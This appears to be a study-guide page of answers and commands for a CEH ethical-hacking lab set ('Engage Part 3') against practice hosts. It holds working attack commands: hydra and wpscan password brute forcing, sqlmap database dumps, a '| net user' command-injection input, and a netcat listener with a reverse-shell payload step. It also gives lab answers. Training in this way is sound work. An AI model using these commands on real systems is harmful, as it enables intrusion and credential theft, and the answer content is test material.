3️⃣CEH Engage Part 3

You have been assigned a task to perform a clickjacking test on www.certifiedhacker.com that the CEHORG members widely use. Find out whether the site is vulnerable to clickjacking.

GhostEye

Nikto

Perform an HTTP-recon on www.certifiedhacker.com and find out the version of Nginx used by the web server.

BillCipher

Whatweb

An FTP site is hosted on a machine in the CEHORG network. Crack the FTP credentials, obtain the “flag.txt” file and determine the content in the file.

nmap -p 21 172.16.0.0/24

nmap -p 21 10.10.10.0/24

nmap -p 21 192.168.0.0/24
hydra -L <username.txt> -P <password.txt> ftp://172.16.0.12

Perform web application reconnaissance on movies.cehorg.com and find out the HTTP server used by the web application.

Whatweb

whatweb movies.cehorg.com

Nmap

Identify the load balancing service used by eccouncil.org. 

ldb eccouncil.org

-> cloudflare

Identify the Content Management System used by www.cehorg.com.

wig www.cehorg.com

Perform a bruteforce attack on www.cehorg.com and find the password of user adam.

wpscan --url http://cehorg.com/wp-login.php -U <username.txt> -P <password.txt>

Perform parameter tampering on movies.cehorg.com and find out the user for id 1003.

Type the username as "Jason" and password as "welcome"

We found this username and password in the engage part 2. While dumping the wireshark capture data. REMEMBER?

You have identified a vulnerable web application on a Linux server at port 8080. Exploit the web application vulnerability, gain access to the server and enter the content of RootFlag.txt as the answer.

nmap -p 8080 172.16.0.0/24

nmap -p 8080 10.10.10.0/24

nmap -p 8080 192.168.0.0/24

Extract and Setup Jdk

tar -xf jdk-8u202-linux-x64.tar.gz

mv jdk1.8.0_202 /usr/bin

Update the JDK Path in the Poc.py file

Change Line no: 62, replace jdk1.8.0_20/bin/javac with "/usr/bin/jdk1.8.0_202/bin/javac"

Change Line no: 87, replace jdk1.8.0_20/bin/java with "/usr/bin/jdk1.8.0_202/bin/java" Change Line no: 99, replace jdk1.8.0_20/bin/java with "/usr/bin/jdk1.8.0_202/bin/java"

Create a Netcat Listener

nc -lvp 9001

Create a Payload

python3 poc.py --userip 10.10.1.13 --webport 8080 --lport 9001

Copy the send me payload and paste in the username field and enter any random password and press Login

Perform command injection attack on 10.10.10.25 and find out how many user accounts are registered with the machine. Note: Exclude admin/Guest user

| net user

A file named Hash.txt has been uploaded through DVWA (http://10.10.10.25:8080/DVWA). The file is located in the directory mentioned below. Access the file and crack the MD5 hash to reveal the original message; enter the content after cracking the hash. You can log into the DVWA using the following credentials. Note: Username- admin; Password- password Path: C:\wamp64\www\DVWA\hackable\uploads\Hash.txt Hint: Use “type” command to view the file. Use the following link to decrypt the hash- https://hashes.com/en/decrypt/hash

LogoDecrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online

Perform Banner grabbing on the web application movies.cehorg.com and find out the ETag of the respective target machine.

Perform Web Crawling on the web application movies.cehorg.com and identify the number of live png files in images folder.

Perform XSS vulnerability test on www.cehorg.com and identify whether the application is vulnerable to attack or not. (Yes/No).

-> No

PwnXSS

python3 pwnxss.py -u http://www.cehorg.com

OWASP ZAP

Perform a SQL Injection attack on movies.cehorg.com and find out the number of users available in the database. Use Jason/welcome as login credentials.

Get Database

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" --dbs

Get Tables

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope --tables

Get number of Users available

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope -T UserProfile --count

Dump Table Data

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="<Cookie Value>" -D moviescope -T User_Login --dump

Dump Databases

sqlmap -u "http://sometestdb.to/view?id=123&Submit=Submit#" --cookie="PHPSESSID=e3f9231953973ace4acb63cfde2ccc08; security=low" -D moviescope --dump-all

CEHORG suspects of a possible session hijacking attack on a machine in its network. The organisation has retained the network traffic data for the session at C:\Users\Admin\Documents in the EH Workstation – 2 as sniffsession.pcap. You have been assigned a task to perform an analysis and find out the protocol that has been used for sniffing on its network.

PreviousCEH Engage Part 2NextCEH Engage Part 4

Last updated

Was this helpful?